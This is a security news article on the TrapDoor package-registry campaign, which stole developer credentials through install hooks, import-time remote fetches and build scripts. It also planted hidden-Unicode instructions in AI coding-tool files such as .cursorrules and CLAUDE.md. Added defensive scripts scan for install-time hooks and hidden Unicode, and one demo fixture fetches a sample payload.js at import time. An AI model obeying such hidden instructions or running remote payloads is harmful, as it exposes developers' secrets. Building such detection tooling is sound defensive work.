CISOOnline

TrapDoor malware campaign puts developer workstations in CISO spotlight

The packages were designed to steal developer secrets, including AWS credentials, GitHub tokens, SSH keys, browser data, environment variables, crypto wallets, and local development configuration files, according to Socket.

The findings indicate a bigger concern than just another malicious package incident. Developer environments increasingly sit at the intersection of source code, cloud infrastructure, CI/CD pipelines, AI coding tools, and privileged credentials. A compromise of one workstation can therefore give attackers a foothold beyond the developer’s machine.

The packages used execution points that are common in normal software development workflows. In npm, the malware relied on postinstall scripts. In PyPI, it used import-time execution to fetch and run remote JavaScript. In Crates.io, it abused Rust build scripts that execute during compilation. That makes the campaign harder to detect using controls focused on a single programming language or package registry.
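The three execution points named above (npm lifecycle scripts, Python import-time code, Rust build scripts) can be checked before a dependency is ever installed or compiled. The script below is an added example, not code from Socket or the article: it walks a checked-out source tree, flags install-time npm scripts in package.json, explicit build keys and build.rs files beside Cargo.toml, and module-scope network, subprocess or exec-style calls in Python sources (code inside function bodies only runs when called, so it is skipped; decorators still run on import and are included). The sample tree in demo() is constructed for illustration and all function names are the example's own.

```python
"""Audit a source tree for install- or import-time execution points:
npm lifecycle scripts, Rust build scripts, and module-scope calls in
Python that reach the network or spawn processes.
Added example code; not from Socket or the article."""
import ast
import json
import re
import tempfile
from pathlib import Path

# npm scripts that run automatically during `npm install`.
NPM_HOOKS = {"preinstall", "install", "postinstall", "prepare"}
# Dotted call prefixes that rarely belong at module scope of a library.
MODULE_PREFIXES = ("requests.", "urllib.", "subprocess.", "socket.",
                   "os.system", "os.popen", "ctypes.")
BUILTIN_SUSPECT = {"exec", "eval", "__import__", "compile"}


def _npm_hooks(path):
    try:
        data = json.loads(path.read_text(encoding="utf-8"))
    except ValueError:
        return [f"{path}: unparseable package.json"]
    scripts = data.get("scripts", {}) if isinstance(data, dict) else {}
    return [f"{path}: npm lifecycle script {name!r} -> {cmd}"
            for name, cmd in scripts.items() if name in NPM_HOOKS]


def _cargo_build_script(path):
    findings = []
    for line in path.read_text(encoding="utf-8").splitlines():
        if re.match(r"^\s*build\s*=", line):
            findings.append(f"{path}: explicit build key: {line.strip()}")
    build_rs = path.parent / "build.rs"
    if build_rs.exists():
        findings.append(f"{build_rs}: Rust build script runs at compile time")
    return findings


def _dotted(func):
    """Return 'a.b.c' for an a.b.c(...) call target, '' for anything else."""
    parts = []
    while isinstance(func, ast.Attribute):
        parts.append(func.attr)
        func = func.value
    if isinstance(func, ast.Name):
        parts.append(func.id)
        return ".".join(reversed(parts))
    return ""


def _import_time_nodes(node):
    """Yield AST nodes that execute when the module is imported: everything
    except the bodies of function definitions and lambdas."""
    yield node
    for child in ast.iter_child_nodes(node):
        if isinstance(child, (ast.FunctionDef, ast.AsyncFunctionDef, ast.Lambda)):
            # Decorator expressions still run at import time.
            for deco in getattr(child, "decorator_list", []):
                yield from _import_time_nodes(deco)
            continue
        yield from _import_time_nodes(child)


def _python_import_time_calls(path):
    try:
        tree = ast.parse(path.read_text(encoding="utf-8"), filename=str(path))
    except SyntaxError:
        return [f"{path}: unparseable Python source"]
    findings = []
    for node in _import_time_nodes(tree):
        if isinstance(node, ast.Call):
            name = _dotted(node.func)
            if name in BUILTIN_SUSPECT or name.startswith(MODULE_PREFIXES):
                findings.append(f"{path}:{node.lineno}: module-scope call to {name}()")
    return findings


def audit_tree(root):
    """Walk `root` and return a list of human-readable findings."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if path.name == "package.json":
            findings += _npm_hooks(path)
        elif path.name == "Cargo.toml":
            findings += _cargo_build_script(path)
        elif path.suffix == ".py":
            findings += _python_import_time_calls(path)
    return findings


def demo():
    """Audit a constructed sample tree (not a real package)."""
    tmp = Path(tempfile.mkdtemp())
    (tmp / "npm-pkg").mkdir()
    (tmp / "npm-pkg" / "package.json").write_text(json.dumps(
        {"name": "sample", "scripts": {"postinstall": "node setup.js", "test": "jest"}}))
    (tmp / "crate").mkdir()
    (tmp / "crate" / "Cargo.toml").write_text('[package]\nname = "sample"\nbuild = "build.rs"\n')
    (tmp / "crate" / "build.rs").write_text("fn main() {}\n")
    (tmp / "pypkg").mkdir()
    (tmp / "pypkg" / "__init__.py").write_text(
        "import urllib.request\n"
        "def helper():\n"
        "    return urllib.request.urlopen('http://example.invalid/')\n"
        "_blob = urllib.request.urlopen('http://example.invalid/payload.js').read()\n")
    return audit_tree(tmp)


if __name__ == "__main__":
    for line in demo():
        print(line)
```

Run it against a vendored node_modules, a Cargo vendor directory or an unpacked sdist before the install step; a finding is not proof of malice (many legitimate packages ship build scripts), but it is the short list a reviewer should read by hand rather than let run unattended.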

TrapDoor also appears to reflect attackers’ growing interest in AI-assisted development environments. Socket said the campaign attempted to alter files used by AI coding tools, including .cursorrules and CLAUDE.md, using hidden Unicode instructions.
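Hidden Unicode in files that an AI coding assistant reads as instructions is easy to miss in a diff viewer but easy to detect mechanically. The script below is an added example, not code from Socket or the article: it scans text for Unicode tag characters (U+E0000 to U+E007F, which render invisibly yet can shadow ASCII text), zero-width and bidirectional control characters, and any other format, private-use or surrogate code point, and it maps a tag-character run back to the ASCII it shadows so a reviewer can see what the file actually says. The file names come from the article; the sample content and the function names are the example's own.

```python
"""Detect hidden Unicode in AI assistant configuration files such as
.cursorrules and CLAUDE.md.  Added example code; not from Socket or
the article."""
import unicodedata
from pathlib import Path

AI_CONFIG_NAMES = {".cursorrules", "CLAUDE.md"}  # names cited in the article
TAG_LOW, TAG_HIGH = 0xE0000, 0xE007F             # Unicode "tag" block
ZERO_WIDTH = {0x00AD, 0x200B, 0x200C, 0x200D, 0x2060,
              0x2061, 0x2062, 0x2063, 0x2064, 0xFEFF}
BIDI_CONTROLS = set(range(0x202A, 0x202F)) | set(range(0x2066, 0x206A))


def is_hidden(ch):
    cp = ord(ch)
    if TAG_LOW <= cp <= TAG_HIGH or cp in ZERO_WIDTH or cp in BIDI_CONTROLS:
        return True
    # Cf = format, Co = private use, Cs = surrogate: none belong in a rules file.
    return unicodedata.category(ch) in ("Cf", "Co", "Cs")


def scan_text(text):
    """Return (offset, codepoint, name) for every hidden character."""
    return [(i, ord(ch), unicodedata.name(ch, "<unnamed>"))
            for i, ch in enumerate(text) if is_hidden(ch)]


def decode_tags(text):
    """Map printable tag characters back to the ASCII they shadow."""
    return "".join(chr(ord(ch) - TAG_LOW) for ch in text
                   if TAG_LOW + 0x20 <= ord(ch) <= TAG_LOW + 0x7E)


def scan_tree(root):
    """Scan every AI config file under `root`; undecodable bytes surface as
    surrogates and are reported as hidden characters too."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.name in AI_CONFIG_NAMES and path.is_file():
            text = path.read_text(encoding="utf-8", errors="surrogateescape")
            hits = scan_text(text)
            if hits:
                report[str(path)] = {"hidden": hits, "decoded_tags": decode_tags(text)}
    return report


def build_sample():
    """Constructed .cursorrules content: visible rules plus an invisible
    tag-character run and a zero-width space (not a real campaign artifact)."""
    invisible = "".join(chr(TAG_LOW + ord(c)) for c in "sample hidden text")
    return "# Project rules\nPrefer small, reviewed commits.\n" + invisible + "\u200b\n"


def demo():
    text = build_sample()
    return scan_text(text), decode_tags(text)


if __name__ == "__main__":
    hits, decoded = demo()
    print(f"{len(hits)} hidden characters; tag run decodes to: {decoded!r}")
```

A useful place for this check is a pre-commit hook or CI step that fails the build when scan_tree() returns anything for the repository's assistant configuration files, since those files are rarely expected to contain non-printable characters at all.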


